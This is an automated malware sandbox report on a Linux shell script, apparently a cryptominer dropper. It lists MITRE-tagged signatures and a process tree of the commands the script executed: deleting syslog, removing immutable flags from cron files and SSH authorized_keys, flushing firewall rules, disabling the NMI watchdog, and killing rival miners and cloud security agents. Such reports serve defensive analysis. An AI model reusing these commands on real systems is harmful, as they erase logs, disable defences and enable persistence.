3859228f749da18c65d0dab3f5efa45485967db2751a5a5ca604d06e5ff0607b

Analysis

max time kernel
127s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20221125-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20221125-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
05/06/2023, 20:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ex.sh
Size

33KB
MD5

64cee920fe0de7406b82e77d2a050643
SHA1

4b9f0472a54a14fb88b67ce15d5771ee59c634eb
SHA256

3859228f749da18c65d0dab3f5efa45485967db2751a5a5ca604d06e5ff0607b
SHA512

5bfc29d014ed5746c015cf4e3695020e66192810227edfd589ab358022df0f8d25d24cd04aa3c3650f47fe6c8fcbe3a4bf05995f484fc8a259678755e8459320
SSDEEP

384:aAC6+7pQwKL//OMHDf6jlpTWg3vMGQiirhv6R+wMeWGj4CC9vEKMvU/4Qdre21j/:S7LzQ5VFNcDAFLcIwgnoYq0xFBrHtguz

Score

7^/10

evasion persistence rootkit

Malware Config

Signatures

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal on Host

T1070

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 2 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

pid	Process
810	iptables
634	ufw

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

ioc	pid	Process
/lib/modules/4.15.0-161-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	642	modprobe

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
656	iptables
752	ip6tables
764	ip6tables
772	ip6tables
979	xargs
1019	xargs
660	iptables
845	xargs
949	xargs
1032	xargs
856	xargs
1023	xargs
997	xargs
633	chattr
770	ip6tables
824	xargs
836	xargs
868	xargs
955	xargs
973	xargs
1015	xargs
815	chattr
683	iptables
688	iptables
691	iptables
703	iptables
732	ip6tables
741	ip6tables
773	ip6tables
1027	xargs
631	chattr
690	iptables
768	ip6tables
967	xargs
1009	xargs
1036	xargs
657	iptables
767	ip6tables
771	ip6tables
796	ip6tables
632	chattr
655	iptables
671	iptables
687	iptables
715	iptables
784	ip6tables
804	ip6tables
925	xargs
937	xargs
961	xargs
991	xargs
651	iptables
659	iptables
830	xargs
640	ufw-init
739	ip6tables
838	grep
840	grep
850	xargs
630	chattr
723	iptables
737	ip6tables
740	ip6tables
874	xargs

Creates/modifies Cron job 1 TTPs 11 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.J8yewm	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.WG2lZt	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.wMIKTv	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.ukMU4u	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.DVIMPx	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.i7Znqh	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.PUs9sp	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.5z7fCn	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.mxGZmr	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.5BZ5bt	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.v3WrHB	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 49 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/module/x_tables/initstate	modprobe
File opened for reading	/sys/module/ip6_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/5/cmdline	pkill
File opened for reading	/proc/7/cmdline	pkill
File opened for reading	/proc/18/cmdline	pkill
File opened for reading	/proc/10/status	pkill
File opened for reading	/proc/stat	ps
File opened for reading	/proc/4/cmdline	pkill
File opened for reading	/proc/176/cmdline	pkill
File opened for reading	/proc/35/status	pkill
File opened for reading	/proc/168/cmdline	ps
File opened for reading	/proc/84/cmdline	pkill
File opened for reading	/proc/626/status	pkill
File opened for reading	/proc/373/cmdline	pkill
File opened for reading	/proc/1/cmdline	pkill
File opened for reading	/proc/179/cmdline	pkill
File opened for reading	/proc/98/cmdline	pkill
File opened for reading	/proc/368/cmdline	ps
File opened for reading	/proc/31/cmdline	ps
File opened for reading	/proc/312/status	pkill
File opened for reading	/proc/1055/status	pkill
File opened for reading	/proc/1/status	pkill
File opened for reading	/proc/180/cmdline	pkill
File opened for reading	/proc/81/cmdline	pkill
File opened for reading	/proc/171/status	pkill
File opened for reading	/proc/176/status	pkill
File opened for reading	/proc/175/cmdline	pkill
File opened for reading	/proc/sys/kernel/osrelease	pkill
File opened for reading	/proc/19/cmdline	pkill
File opened for reading	/proc/182/cmdline	pkill
File opened for reading	/proc/78/status	pkill
File opened for reading	/proc/11/cmdline	pkill
File opened for reading	/proc/28/stat	ps
File opened for reading	/proc/205/cmdline	pkill
File opened for reading	/proc/10/cmdline	pkill
File opened for reading	/proc/19/cmdline	ps
File opened for reading	/proc/171/stat	ps
File opened for reading	/proc/32/status	pkill
File opened for reading	/proc/35/status	pkill
File opened for reading	/proc/78/cmdline	pkill
File opened for reading	/proc/393/status	pkill
File opened for reading	/proc/5/status	pkill
File opened for reading	/proc/171/cmdline	pkill
File opened for reading	/proc/9/cmdline	pkill
File opened for reading	/proc/166/cmdline	pkill
File opened for reading	/proc/239/cmdline	pkill
File opened for reading	/proc/469/cmdline	pkill
File opened for reading	/proc/626/status	pkill
File opened for reading	/proc/410/status	pkill
File opened for reading	/proc/174/status	pkill
File opened for reading	/proc/14/status	pkill
File opened for reading	/proc/166/stat	ps
File opened for reading	/proc/19/cmdline	pkill
File opened for reading	/proc/167/cmdline	pkill
File opened for reading	/proc/128/status	pkill
File opened for reading	/proc/168/status	pkill
File opened for reading	/proc/9/status	pkill
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/174/cmdline	pkill
File opened for reading	/proc/14/cmdline	pkill
File opened for reading	/proc/128/cmdline	pkill
File opened for reading	/proc/368/status	pkill
File opened for reading	/proc/169/cmdline	pkill
File opened for reading	/proc/425/cmdline	pkill
File opened for reading	/proc/20/status	pkill
File opened for reading	/proc/10/cmdline	pkill

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/log_rot	ex.sh

/tmp/ex.sh
/tmp/ex.sh
1⤵
- Writes file to tmp directory
PID:628
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:629
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:630
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:631
- /usr/bin/chattr
  chattr -R -i /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:632
- /usr/bin/chattr
  chattr -i /etc/crontab
  2⤵
  - Attempts to change immutable files
  PID:633
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:634
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:635
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    - Attempts to change immutable files
    PID:640
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:641
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        
        PID:642
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:646
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:649
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:650
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:651
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:652
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:653
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:654
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      Attempts to change immutable files
      PID:655
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:656
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      Attempts to change immutable files
      PID:657
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:658
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      Attempts to change immutable files
      PID:659
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:660
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:661
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:662
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:663
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:664
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:665
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:666
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:667
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:668
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:669
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:670
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      Attempts to change immutable files
      PID:671
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:672
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:673
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:674
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:675
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:676
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:677
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:678
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:679
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:680
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:681
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:682
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:683
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:684
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:685
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:686
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      Attempts to change immutable files
      PID:687
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:688
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:689
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      Attempts to change immutable files
      PID:690
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      Attempts to change immutable files
      PID:691
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:692
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:693
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:694
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:695
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:696
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:697
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:698
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:699
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:700
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:701
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:702
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      Attempts to change immutable files
      PID:703
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:704
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:705
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:706
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:707
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:708
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:709
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:710
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:711
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:712
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:713
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:714
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:715
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:716
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:717
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:718
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:719
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:720
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:721
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:722
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:723
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:724
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:725
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:726
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:727
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:728
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:729
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:730
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:731
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:732
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:733
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:734
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:735
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:736
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:737
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:738
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      Attempts to change immutable files
      PID:739
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      Attempts to change immutable files
      PID:740
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:741
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:742
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:743
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:744
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:745
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:746
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:747
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:748
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:749
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:750
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:751
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      Attempts to change immutable files
      PID:752
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:753
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:754
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:755
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:756
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:757
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:758
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:759
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:760
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:761
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:762
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:763
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:764
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:765
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:766
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:767
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      Attempts to change immutable files
      PID:768
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:769
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      Attempts to change immutable files
      PID:770
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      Attempts to change immutable files
      PID:771
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      Attempts to change immutable files
      PID:772
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:773
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:774
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:775
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:776
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:777
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:778
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:779
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:780
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:781
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:782
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:783
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      Attempts to change immutable files
      PID:784
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:785
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:786
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:787
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:788
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:789
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:790
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:791
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:792
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:793
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:794
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:795
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:796
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:797
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:798
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:799
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:800
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:801
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:802
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:803
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:804
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:805
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:806
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:807
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:808
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:809
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:810
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:811
- - /sbin/sysctl
    sysctl "kernel.nmi_watchdog=0"
    3⤵
    PID:812
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:813
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:814
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:815
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  PID:816
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:817
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:818
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:819
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:820
- /bin/grep
  grep /dot
  2⤵
  PID:821
- /bin/grep
  grep -v grep
  2⤵
  PID:822
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:823
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:824
- /usr/bin/pkill
  pkill -f hezb
  2⤵
  - Reads CPU attributes
  PID:825
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:826
- /bin/grep
  grep tracepath
  2⤵
  PID:827
- /bin/grep
  grep -v grep
  2⤵
  PID:828
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:829
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:830
- /usr/bin/pkill
  pkill -f /tmp/.out
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:831
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:832
- /bin/grep
  grep ./ll1
  2⤵
  PID:833
- /bin/grep
  grep -v grep
  2⤵
  PID:834
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:835
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:836
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:837
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:838
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:839
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:840
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:842
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:843
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:844
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:845
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:847
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:848
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:849
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:850
- /bin/grep
  grep 207.38.87.6
  2⤵
  PID:852
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:853
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:854
- /bin/grep
  grep -v -
  2⤵
  PID:855
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:856
- /bin/grep
  grep 34.81.218.76:9486
  2⤵
  PID:858
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:859
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:860
- /bin/grep
  grep -v -
  2⤵
  PID:861
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:862
- /bin/grep
  grep 42.112.28.216:9486
  2⤵
  PID:864
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:865
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:866
- /bin/grep
  grep -v -
  2⤵
  PID:867
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:868
- /usr/bin/pkill
  pkill -f .git/kthreaddw
  2⤵
  - Reads CPU attributes
  PID:869
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:870
- /bin/grep
  grep agetty
  2⤵
  PID:871
- /bin/grep
  grep -v grep
  2⤵
  PID:872
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:873
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
